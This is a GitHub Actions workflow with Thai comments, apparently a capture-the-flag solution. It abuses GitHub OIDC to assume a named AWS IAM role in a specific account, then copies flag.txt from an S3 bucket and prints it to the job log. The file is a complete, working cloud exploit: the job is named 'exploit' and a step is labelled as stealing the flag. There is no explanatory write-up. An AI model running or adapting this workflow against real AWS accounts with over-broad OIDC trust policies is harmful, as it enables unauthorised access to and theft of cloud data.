name: Get The Flag

on:
push:
branches: [ main ]
workflow_dispatch:


permissions:
id-token: write
contents: read

jobs:
exploit:
runs-on: ubuntu-latest

steps:
  # ขั้นตอนที่ 1: Checkout repository (Uses ต้องย่อหน้าให้ตรงกับ Name)
  - name: Checkout repository
    uses: actions/checkout@v3

  # ขั้นตอนที่ 2: Assume Role (Uses ต้องย่อหน้าให้ตรงกับ Name)
  - name: Assume Target AWS Role
    uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875"
      role-session-name: Hacker-Session-${{ github.run_id }}
      aws-region: "ap-southeast-1"

  # ขั้นตอนที่ 3: ขโมย Flag
  - name: Steal and Print the Full Flag
    run: |
      echo "Attempting to read the secret flag from S3..."
      # คัดลอกไฟล์จาก S3 Bucket
      aws s3 cp s3://oh-i-really-do-care/flag.txt .
      
      # พิมพ์เนื้อหาของ Flag ออกมาใน Log
      echo "--- FLAG CONTENT ---"
      cat flag.txt 
      echo "--- END FLAG ---"
